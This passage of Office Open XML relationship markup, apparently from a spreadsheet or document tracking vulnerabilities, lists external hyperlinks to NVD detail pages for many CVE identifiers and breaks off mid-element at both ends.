Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72949" TargetMode="External" Id="rId2766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72954" TargetMode="External" Id="rId2767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72989" TargetMode="External" Id="rId2768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73017" TargetMode="External" Id="rId2769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73088" TargetMode="External" Id="rId2770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73089" TargetMode="External" Id="rId2771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73246" TargetMode="External" Id="rId2772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73249" TargetMode="External" Id="rId2773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73285" TargetMode="External" Id="rId2774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73406" TargetMode="External" Id="rId2775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73415" TargetMode="External" Id="rId2776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73418" TargetMode="External" Id="rId2777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73493" TargetMode="External" Id="rId2778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73507" TargetMode="External" Id="rId2779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73561" TargetMode="External" Id="rId2780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73785" TargetMode="External" Id="rId2781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73786" TargetMode="External" Id="rId2782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74761" TargetMode="External" Id="rId2783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75328" TargetMode="External" Id="rId2784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75368" TargetMode="External" Id="rId2785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75371" TargetMode="External" Id="rId2786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75413" TargetMode="External" Id="rId2787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75438" TargetMode="External" Id="rId2788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75465" TargetMode="External" Id="rId2789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75501" TargetMode="External" Id="rId2790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75998" TargetMode="External" Id="rId2791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76098" TargetMode="External" Id="rId2792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76169" TargetMode="External" Id="rId2793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76560" TargetMode="External" Id="rId2794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76905" TargetMode="External" Id="rId2795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76956" TargetMode="External" Id="rId2796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77108" TargetMode="External" Id="rId2797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77124" TargetMode="External" Id="rId2798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77384" TargetMode="External" Id="rId2799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77438" TargetMode="External" Id="rId2800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77465" TargetMode="External" Id="rId2801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77494" TargetMode="External" Id="rId2802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77498" TargetMode="External" Id="rId2803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77499" TargetMode="External" Id="rId2804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77501" TargetMode="External" Id="rId2805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77502" TargetMode="External" Id="rId2806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77771" TargetMode="External" Id="rId2807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77807" TargetMode="External" Id="rId2808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77886" TargetMode="External" Id="rId2809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77888" TargetMode="External" Id="rId2810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77889" TargetMode="External" Id="rId2811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77890" TargetMode="External" Id="rId2812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77893" TargetMode="External" Id="rId2813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77895" TargetMode="External" Id="rId2814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77898" TargetMode="External" Id="rId2815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78071" TargetMode="External" Id="rId2816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78130" TargetMode="External" Id="rId2817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78132" TargetMode="External" Id="rId2818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78133" TargetMode="External" Id="rId2819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78480" TargetMode="External" Id="rId2820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78490" TargetMode="External" Id="rId2821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78523" TargetMode="External" Id="rId2822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78543" TargetMode="External" Id="rId2823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78574" TargetMode="External" Id="rId2824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78837" TargetMode="External" Id="rId2825" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79323" TargetMode="External" Id="rId2826" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79324" TargetMode="External" Id="rId2827" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79377" TargetMode="External" Id="rId2828" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79378" TargetMode="External" Id="rId2829" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79390" TargetMode="External" Id="rId2830" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79407" TargetMode="External" Id="rId2831" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79572" TargetMode="External" Id="rId2832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79575" TargetMode="External" Id="rId2833" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79641" TargetMode="External" Id="rId2834" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79734" TargetMode="External" Id="rId2835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79738" TargetMode="External" Id="rId2836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79740" TargetMode="External" Id="rId2837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79950" TargetMode="External" Id="rId2838" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80123" TargetMode="External" Id="rId2839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80135" TargetMode="External" Id="rId2840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80212" TargetMode="External" Id="rId2841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80229" TargetMode="External" Id="rId2842" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80230" TargetMode="External" Id="rId2843" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80231" TargetMode="External" Id="rId2844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80255" TargetMode="External" Id="rId2845" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80924" TargetMode="External" Id="rId2846" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81265" TargetMode="External" Id="rId2847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81270" TargetMode="External" Id="rId2848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81355" TargetMode="External" Id="rId2849" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81624" TargetMode="External" Id="rId2850" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81665" TargetMode="External" Id="rId2851" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81786" TargetMode="External" Id="rId2852" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81790" TargetMode="External" Id="rId2853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81794" TargetMode="External" Id="rId2854" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81799" TargetMode="External" Id="rId2855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81803" TargetMode="External" Id="rId2856" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81804" TargetMode="External" Id="rId2857" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82208" TargetMode="External" Id="rId2858" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82393" TargetMode="External" Id="rId2859" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82397" TargetMode="External" Id="rId2860" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83989" TargetMode="External" Id="rId2861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84001" TargetMode="External" Id="rId2862" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84219" TargetMode="External" Id="rId2863" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84374" TargetMode="External" Id="rId2864" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84375" TargetMode="External" Id="rId2865" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84382" TargetMode="External" Id="rId2866" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84428" TargetMode="External" Id="rId2867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84469" TargetMode="External" Id="rId2868" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84821" TargetMode="External" Id="rId2869" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85045" TargetMode="External" Id="rId2870" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85124" TargetMode="External" Id="rId2871" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85150" TargetMode="External" Id="rId2872" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85400" TargetMode="External" Id="rId2873" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85505" TargetMode="External" Id="rId2874" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86093" TargetMode="External" Id="rId2875" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86287" TargetMode="External" Id="rId2876" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86711" TargetMode="External" Id="rId2877" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87011" TargetMode="External" Id="rId2878" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87431" TargetMode="External" Id="rId2879" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87450" TargetMode="External" Id="rId2880" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87601" TargetMode="External" Id="rId2881" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87734" TargetMode="External" Id="rId2882" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87776" TargetMode="External" Id="rId2883" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87853" TargetMode="External" Id="rId2884" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87908" TargetMode="External" Id="rId2885" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88045" TargetMode="External" Id="rId2886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88286" TargetMode="External" Id="rId2887" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88287" TargetMode="External" Id="rId2888" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88289" TargetMode="External" Id="rId2889" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88290" TargetMode="External" Id="rId2890" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8862" TargetMode="External" Id="rId2891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9166" TargetMode="External" Id="rId2892" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-1249" TargetMode="External" Id="rId2893" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13608" TargetMode="External" Id="rId2894" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18489" TargetMode="External" Id="rId2895" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19651" TargetMode="External" Id="rId2896" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32589" TargetMode="External" Id="rId2897" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3833" TargetMode="External" Id="rId2898" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42033" TargetMode="External" Id="rId2899" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48079" TargetMode="External" Id="rId2900" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48084" TargetMode="External" Id="rId2901" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48526" TargetMode="External" Id="rId2902" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50577" TargetMode="External" Id="rId2903" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53525" TargetMode="External" Id="rId2904" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54550" TargetMode="External" Id="rId2905" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56135" TargetMode="External" Id="rId2906" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5795" TargetMode="External" Id="rId2907" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62669" TargetMode="External" Id="rId2908" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62906" TargetMode="External" Id="rId2909" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69347" TargetMode="External" Id="rId2910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70604" TargetMode="External" Id="rId2911" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70666" TargetMode="External" Id="rId2912" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71375" TargetMode="External" Id="rId2913" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71622" TargetMode="External" Id="rId2914" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73086" TargetMode="External" Id="rId2915" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73495" TargetMode="External" Id="rId2916" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76196" TargetMode="External" Id="rId2917" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78254" TargetMode="External" Id="rId2918" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78461" TargetMode="External" Id="rId2919" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78492" TargetMode="External" Id="rId2920" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78494" TargetMode="External" Id="rId2921" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79644" TargetMode="External" Id="rId2922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79963" TargetMode="External" Id="rId2923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80133" TargetMode="External" Id="rId2924" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80434" TargetMode="External" Id="rId2925" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81383" TargetMode="External" Id="rId2926" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84003" TargetMode="External" Id="rId2927" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84366" TargetMode="External" Id="rId2928" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84961" TargetMode="External" Id="rId2929" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85152" 